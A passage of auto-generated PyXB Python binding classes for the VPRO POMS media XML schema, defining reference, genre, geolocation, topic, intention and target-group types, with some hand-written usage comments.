__subtitles.name() : __subtitles,
__offset.name() : __offset,
__duration.name() : __duration
})
_AttributeMap.update({
__type.name() : __type,
__platform.name() : __platform,
__owner.name() : __owner,
__urn.name() : __urn,
__publishStart.name() : __publishStart,
__publishStop.name() : __publishStop,
__publishDate.name() : __publishDate,
__creationDate.name() : __creationDate,
__lastModified.name() : __lastModified,
__workflow.name() : __workflow
})
_module_typeBindings.locationType = locationType
Namespace.addCategoryObject('typeBinding', 'locationType', locationType)
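# Hand-written usage sketch: locationType requires the 'owner' attribute;
# simple-typed child elements such as programUrl accept plain Python values,
# which PyXB coerces on assignment. The URL and owner literal are illustrative
# assumptions:
#
#   loc = locationType(owner='BROADCASTER')
#   loc.programUrl = 'https://example.com/streams/clip.mp4'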
# Complex type {urn:vpro:media:2009}descendantRefType with content type EMPTY
class descendantRefType (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {urn:vpro:media:2009}descendantRefType with content type EMPTY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_EMPTY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'descendantRefType')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 850, 2)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Attribute midRef uses Python identifier midRef
__midRef = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'midRef'), 'midRef', '__urnvpromedia2009_descendantRefType_midRef', _module_typeBindings.midType)
__midRef._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 851, 4)
__midRef._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 851, 4)
midRef = property(__midRef.value, __midRef.set, None, None)
# Attribute urnRef uses Python identifier urnRef
__urnRef = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'urnRef'), 'urnRef', '__urnvpromedia2009_descendantRefType_urnRef', pyxb.binding.datatypes.anyURI)
__urnRef._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 852, 4)
__urnRef._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 852, 4)
urnRef = property(__urnRef.value, __urnRef.set, None, None)
# Attribute type uses Python identifier type
__type = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'type'), 'type', '__urnvpromedia2009_descendantRefType_type', _module_typeBindings.mediaTypeEnum, required=True)
__type._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 853, 4)
__type._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 853, 4)
type = property(__type.value, __type.set, None, None)
_ElementMap.update({
})
_AttributeMap.update({
__midRef.name() : __midRef,
__urnRef.name() : __urnRef,
__type.name() : __type
})
_module_typeBindings.descendantRefType = descendantRefType
Namespace.addCategoryObject('typeBinding', 'descendantRefType', descendantRefType)
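# Hand-written usage sketch: the content model is EMPTY, so a descendantRefType
# is built from attributes alone; the MID and the 'BROADCAST' literal are
# assumed values:
#
#   ref = descendantRefType(midRef='VPWON_1234567', type='BROADCAST')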
# Complex type {urn:vpro:media:2009}memberRefType with content type ELEMENT_ONLY
class memberRefType (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {urn:vpro:media:2009}memberRefType with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'memberRefType')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 859, 2)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element {urn:vpro:media:2009}episodeOf uses Python identifier episodeOf
__episodeOf = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'episodeOf'), 'episodeOf', '__urnvpromedia2009_memberRefType_urnvpromedia2009episodeOf', True, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 861, 6), )
episodeOf = property(__episodeOf.value, __episodeOf.set, None, None)
# Element {urn:vpro:media:2009}memberOf uses Python identifier memberOf
__memberOf = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'memberOf'), 'memberOf', '__urnvpromedia2009_memberRefType_urnvpromedia2009memberOf', True, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 862, 6), )
memberOf = property(__memberOf.value, __memberOf.set, None, None)
# Element {urn:vpro:media:2009}segmentOf uses Python identifier segmentOf
__segmentOf = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'segmentOf'), 'segmentOf', '__urnvpromedia2009_memberRefType_urnvpromedia2009segmentOf', False, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 863, 6), )
segmentOf = property(__segmentOf.value, __segmentOf.set, None, None)
# Attribute midRef uses Python identifier midRef
__midRef = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'midRef'), 'midRef', '__urnvpromedia2009_memberRefType_midRef', _module_typeBindings.midType)
__midRef._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 865, 4)
__midRef._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 865, 4)
midRef = property(__midRef.value, __midRef.set, None, '\n Reference to the MID of the parent of this object.\n ')
# Attribute urnRef uses Python identifier urnRef
__urnRef = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'urnRef'), 'urnRef', '__urnvpromedia2009_memberRefType_urnRef', pyxb.binding.datatypes.anyURI)
__urnRef._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 872, 4)
__urnRef._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 872, 4)
urnRef = property(__urnRef.value, __urnRef.set, None, "\n              Reference to the URN of the parent of this object. URNs are no longer actively used, but the attribute is\n              still available for backwards compatibility.\n            ")
# Attribute cridRef uses Python identifier cridRef
__cridRef = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'cridRef'), 'cridRef', '__urnvpromedia2009_memberRefType_cridRef', pyxb.binding.datatypes.anyURI)
__cridRef._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 880, 4)
__cridRef._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 880, 4)
cridRef = property(__cridRef.value, __cridRef.set, None, '\n Reference to a crid of the parent of this object. This is only used for imports from systems that cannot\n supply a MID or URN. POMS does not export or publish parent crids.\n ')
# Attribute type uses Python identifier type
__type = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'type'), 'type', '__urnvpromedia2009_memberRefType_type', _module_typeBindings.mediaTypeEnum)
__type._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 888, 4)
__type._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 888, 4)
type = property(__type.value, __type.set, None, None)
# Attribute index uses Python identifier index
__index = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'index'), 'index', '__urnvpromedia2009_memberRefType_index', pyxb.binding.datatypes.positiveInteger)
__index._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 889, 4)
__index._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 889, 4)
index = property(__index.value, __index.set, None, None)
# Attribute highlighted uses Python identifier highlighted
__highlighted = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'highlighted'), 'highlighted', '__urnvpromedia2009_memberRefType_highlighted', pyxb.binding.datatypes.boolean, unicode_default='false')
__highlighted._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 890, 4)
__highlighted._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 890, 4)
highlighted = property(__highlighted.value, __highlighted.set, None, None)
# Attribute added uses Python identifier added
__added = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'added'), 'added', '__urnvpromedia2009_memberRefType_added', pyxb.binding.datatypes.dateTime)
__added._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 891, 4)
__added._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 891, 4)
added = property(__added.value, __added.set, None, None)
_ElementMap.update({
__episodeOf.name() : __episodeOf,
__memberOf.name() : __memberOf,
__segmentOf.name() : __segmentOf
})
_AttributeMap.update({
__midRef.name() : __midRef,
__urnRef.name() : __urnRef,
__cridRef.name() : __cridRef,
__type.name() : __type,
__index.name() : __index,
__highlighted.name() : __highlighted,
__added.name() : __added
})
_module_typeBindings.memberRefType = memberRefType
Namespace.addCategoryObject('typeBinding', 'memberRefType', memberRefType)
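# Hand-written usage sketch: per the docstrings above, midRef points at the
# parent's MID while urnRef/cridRef remain only for backwards compatibility, so
# new code would typically set midRef plus an optional index. The values are
# assumptions:
#
#   member = memberRefType(midRef='POMS_S_VPRO_123456', type='SERIES', index=1)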
# Complex type {urn:vpro:media:2009}recursiveMemberRef with content type ELEMENT_ONLY
class recursiveMemberRef (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {urn:vpro:media:2009}recursiveMemberRef with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'recursiveMemberRef')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 897, 1)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element {urn:vpro:media:2009}memberOf uses Python identifier memberOf
__memberOf = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'memberOf'), 'memberOf', '__urnvpromedia2009_recursiveMemberRef_urnvpromedia2009memberOf', True, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 899, 6), )
memberOf = property(__memberOf.value, __memberOf.set, None, None)
# Element {urn:vpro:media:2009}episodeOf uses Python identifier episodeOf
__episodeOf = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'episodeOf'), 'episodeOf', '__urnvpromedia2009_recursiveMemberRef_urnvpromedia2009episodeOf', True, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 900, 6), )
episodeOf = property(__episodeOf.value, __episodeOf.set, None, None)
# Element {urn:vpro:media:2009}segmentOf uses Python identifier segmentOf
__segmentOf = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'segmentOf'), 'segmentOf', '__urnvpromedia2009_recursiveMemberRef_urnvpromedia2009segmentOf', False, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 901, 6), )
segmentOf = property(__segmentOf.value, __segmentOf.set, None, None)
# Attribute midRef uses Python identifier midRef
__midRef = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'midRef'), 'midRef', '__urnvpromedia2009_recursiveMemberRef_midRef', pyxb.binding.datatypes.string)
__midRef._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 903, 4)
__midRef._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 903, 4)
midRef = property(__midRef.value, __midRef.set, None, None)
# Attribute type uses Python identifier type
__type = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'type'), 'type', '__urnvpromedia2009_recursiveMemberRef_type', _module_typeBindings.mediaTypeEnum)
__type._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 904, 4)
__type._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 904, 4)
type = property(__type.value, __type.set, None, None)
# Attribute index uses Python identifier index
__index = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'index'), 'index', '__urnvpromedia2009_recursiveMemberRef_index', pyxb.binding.datatypes.int)
__index._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 905, 4)
__index._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 905, 4)
index = property(__index.value, __index.set, None, None)
# Attribute highlighted uses Python identifier highlighted
__highlighted = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'highlighted'), 'highlighted', '__urnvpromedia2009_recursiveMemberRef_highlighted', pyxb.binding.datatypes.boolean, unicode_default='false')
__highlighted._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 906, 4)
__highlighted._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 906, 4)
highlighted = property(__highlighted.value, __highlighted.set, None, None)
_ElementMap.update({
__memberOf.name() : __memberOf,
__episodeOf.name() : __episodeOf,
__segmentOf.name() : __segmentOf
})
_AttributeMap.update({
__midRef.name() : __midRef,
__type.name() : __type,
__index.name() : __index,
__highlighted.name() : __highlighted
})
_module_typeBindings.recursiveMemberRef = recursiveMemberRef
Namespace.addCategoryObject('typeBinding', 'recursiveMemberRef', recursiveMemberRef)
# Complex type {urn:vpro:media:2009}genreType with content type ELEMENT_ONLY
class genreType (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {urn:vpro:media:2009}genreType with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'genreType')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 949, 2)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element {urn:vpro:media:2009}term uses Python identifier term
__term = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'term'), 'term', '__urnvpromedia2009_genreType_urnvpromedia2009term', True, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 951, 6), )
term = property(__term.value, __term.set, None, None)
# Attribute id uses Python identifier id
__id = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'id'), 'id', '__urnvpromedia2009_genreType_id', _module_typeBindings.genreIdType, required=True)
__id._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 953, 4)
__id._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 953, 4)
id = property(__id.value, __id.set, None, None)
_ElementMap.update({
__term.name() : __term
})
_AttributeMap.update({
__id.name() : __id
})
_module_typeBindings.genreType = genreType
Namespace.addCategoryObject('typeBinding', 'genreType', genreType)
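# Hand-written usage sketch: 'term' is declared with multiple occurrence, so
# PyXB exposes it as a list-like property. The genre id and term text are
# assumed values in the genreIdType format:
#
#   g = genreType(id='3.0.1.7')
#   g.term.append('Informatief')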
# Complex type {urn:vpro:media:2009}geoLocationsType with content type ELEMENT_ONLY
class geoLocationsType (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {urn:vpro:media:2009}geoLocationsType with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'geoLocationsType')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 972, 2)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element {urn:vpro:media:2009}geoLocation uses Python identifier geoLocation
__geoLocation = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'geoLocation'), 'geoLocation', '__urnvpromedia2009_geoLocationsType_urnvpromedia2009geoLocation', True, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 974, 6), )
geoLocation = property(__geoLocation.value, __geoLocation.set, None, None)
# Attribute owner uses Python identifier owner
__owner = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'owner'), 'owner', '__urnvpromedia2009_geoLocationsType_owner', _ImportedBinding_npoapi_xml_shared.ownerTypeEnum)
__owner._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 976, 4)
__owner._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 976, 4)
owner = property(__owner.value, __owner.set, None, None)
_ElementMap.update({
__geoLocation.name() : __geoLocation
})
_AttributeMap.update({
__owner.name() : __owner
})
_module_typeBindings.geoLocationsType = geoLocationsType
Namespace.addCategoryObject('typeBinding', 'geoLocationsType', geoLocationsType)
# Complex type {urn:vpro:media:2009}geoLocationType with content type ELEMENT_ONLY
class geoLocationType (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {urn:vpro:media:2009}geoLocationType with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'geoLocationType')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 979, 2)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element {urn:vpro:media:2009}name uses Python identifier name
__name = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'name'), 'name', '__urnvpromedia2009_geoLocationType_urnvpromedia2009name', False, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 981, 6), )
name = property(__name.value, __name.set, None, None)
# Element {urn:vpro:media:2009}scopeNote uses Python identifier scopeNote
__scopeNote = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'scopeNote'), 'scopeNote', '__urnvpromedia2009_geoLocationType_urnvpromedia2009scopeNote', True, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 982, 6), )
scopeNote = property(__scopeNote.value, __scopeNote.set, None, None)
# Attribute role uses Python identifier role
__role = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'role'), 'role', '__urnvpromedia2009_geoLocationType_role', _module_typeBindings.geoRoleType, required=True)
__role._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 984, 4)
__role._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 984, 4)
role = property(__role.value, __role.set, None, None)
# Attribute gtaaUri uses Python identifier gtaaUri
__gtaaUri = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'gtaaUri'), 'gtaaUri', '__urnvpromedia2009_geoLocationType_gtaaUri', pyxb.binding.datatypes.string)
__gtaaUri._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 985, 4)
__gtaaUri._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 985, 4)
gtaaUri = property(__gtaaUri.value, __gtaaUri.set, None, None)
# Attribute gtaaStatus uses Python identifier gtaaStatus
__gtaaStatus = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'gtaaStatus'), 'gtaaStatus', '__urnvpromedia2009_geoLocationType_gtaaStatus', _module_typeBindings.gtaaStatusType)
__gtaaStatus._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 986, 4)
__gtaaStatus._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 986, 4)
gtaaStatus = property(__gtaaStatus.value, __gtaaStatus.set, None, None)
_ElementMap.update({
__name.name() : __name,
__scopeNote.name() : __scopeNote
})
_AttributeMap.update({
__role.name() : __role,
__gtaaUri.name() : __gtaaUri,
__gtaaStatus.name() : __gtaaStatus
})
_module_typeBindings.geoLocationType = geoLocationType
Namespace.addCategoryObject('typeBinding', 'geoLocationType', geoLocationType)
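# Hand-written usage sketch: the required 'role' attribute takes a geoRoleType
# literal ('SUBJECT' is assumed here); 'name' is a single child element while
# 'scopeNote' repeats:
#
#   geo = geoLocationType(role='SUBJECT')
#   geo.name = 'Amsterdam'
#   geo.scopeNote.append('Hoofdstad van Nederland')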
# Complex type {urn:vpro:media:2009}topicsType with content type ELEMENT_ONLY
class topicsType (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {urn:vpro:media:2009}topicsType with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'topicsType')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 989, 2)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element {urn:vpro:media:2009}topic uses Python identifier topic
__topic = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'topic'), 'topic', '__urnvpromedia2009_topicsType_urnvpromedia2009topic', True, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 991, 6), )
topic = property(__topic.value, __topic.set, None, None)
# Attribute owner uses Python identifier owner
__owner = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'owner'), 'owner', '__urnvpromedia2009_topicsType_owner', _ImportedBinding_npoapi_xml_shared.ownerTypeEnum)
__owner._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 993, 4)
__owner._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 993, 4)
owner = property(__owner.value, __owner.set, None, None)
_ElementMap.update({
__topic.name() : __topic
})
_AttributeMap.update({
__owner.name() : __owner
})
_module_typeBindings.topicsType = topicsType
Namespace.addCategoryObject('typeBinding', 'topicsType', topicsType)
# Complex type {urn:vpro:media:2009}topicType with content type ELEMENT_ONLY
class topicType (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {urn:vpro:media:2009}topicType with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'topicType')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 996, 2)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element {urn:vpro:media:2009}name uses Python identifier name
__name = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'name'), 'name', '__urnvpromedia2009_topicType_urnvpromedia2009name', False, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 998, 6), )
name = property(__name.value, __name.set, None, None)
# Element {urn:vpro:media:2009}scopeNote uses Python identifier scopeNote
__scopeNote = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'scopeNote'), 'scopeNote', '__urnvpromedia2009_topicType_urnvpromedia2009scopeNote', True, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 999, 6), )
scopeNote = property(__scopeNote.value, __scopeNote.set, None, None)
# Attribute gtaaUri uses Python identifier gtaaUri
__gtaaUri = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'gtaaUri'), 'gtaaUri', '__urnvpromedia2009_topicType_gtaaUri', pyxb.binding.datatypes.string)
__gtaaUri._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 1001, 4)
__gtaaUri._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 1001, 4)
gtaaUri = property(__gtaaUri.value, __gtaaUri.set, None, None)
# Attribute gtaaStatus uses Python identifier gtaaStatus
__gtaaStatus = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'gtaaStatus'), 'gtaaStatus', '__urnvpromedia2009_topicType_gtaaStatus', _module_typeBindings.gtaaStatusType)
__gtaaStatus._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 1002, 4)
__gtaaStatus._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 1002, 4)
gtaaStatus = property(__gtaaStatus.value, __gtaaStatus.set, None, None)
_ElementMap.update({
__name.name() : __name,
__scopeNote.name() : __scopeNote
})
_AttributeMap.update({
__gtaaUri.name() : __gtaaUri,
__gtaaStatus.name() : __gtaaStatus
})
_module_typeBindings.topicType = topicType
Namespace.addCategoryObject('typeBinding', 'topicType', topicType)
# Complex type {urn:vpro:media:2009}intentionType with content type ELEMENT_ONLY
class intentionType (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {urn:vpro:media:2009}intentionType with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'intentionType')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 1005, 2)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element {urn:vpro:media:2009}intention uses Python identifier intention
__intention = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'intention'), 'intention', '__urnvpromedia2009_intentionType_urnvpromedia2009intention', True, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 1007, 6), )
intention = property(__intention.value, __intention.set, None, None)
# Attribute owner uses Python identifier owner
__owner = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'owner'), 'owner', '__urnvpromedia2009_intentionType_owner', _ImportedBinding_npoapi_xml_shared.ownerTypeEnum)
__owner._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 1009, 4)
__owner._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 1009, 4)
owner = property(__owner.value, __owner.set, None, None)
_ElementMap.update({
__intention.name() : __intention
})
_AttributeMap.update({
__owner.name() : __owner
})
_module_typeBindings.intentionType = intentionType
Namespace.addCategoryObject('typeBinding', 'intentionType', intentionType)
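# Hand-written usage sketch: intentionType wraps repeating 'intention' values
# for a given owner; 'INFORM' is an assumed member of the intention
# enumeration:
#
#   intents = intentionType(owner='BROADCASTER')
#   intents.intention.append('INFORM')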
# Complex type {urn:vpro:media:2009}targetGroupsType with content type ELEMENT_ONLY
class targetGroupsType (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {urn:vpro:media:2009}targetGroupsType with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'targetGroupsType')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 1012, 2)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element {urn:vpro:media:2009}targetGroup uses Python identifier targetGroup
__targetGroup = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'targetGroup'), 'targetGroup', '__urnvpromedia2009_targetGroupsType_urnvpromedia2009targetGroup', True, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 1014, 6), )
targetGroup = property(__targetGroup.value, __targetGroup.set, None, None)
# Attribute owner uses Python identifier owner
__owner = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'owner'), 'owner', '__urnvpromedia2009_targetGroupsType_owner', _ImportedBinding_npoapi_xml_shared.ownerTypeEnum)
__owner._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 1016, 4)
__owner._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 1016, 4)
owner = property(__owner.value, __owner.set, None, None)
_ElementMap.update({
__targetGroup.name() : __targetGroup
})
_AttributeMap.update({
__owner.name() : __owner
})
_module_typeBindings.targetGroupsType = targetGroupsType
Namespace.addCategoryObject('typeBinding', 'targetGroupsType', targetGroupsType)
# Complex type {urn:vpro:media:2009}countryType with content type SIMPLE
class countryType (pyxb.binding.basis.complexTypeDefinition):
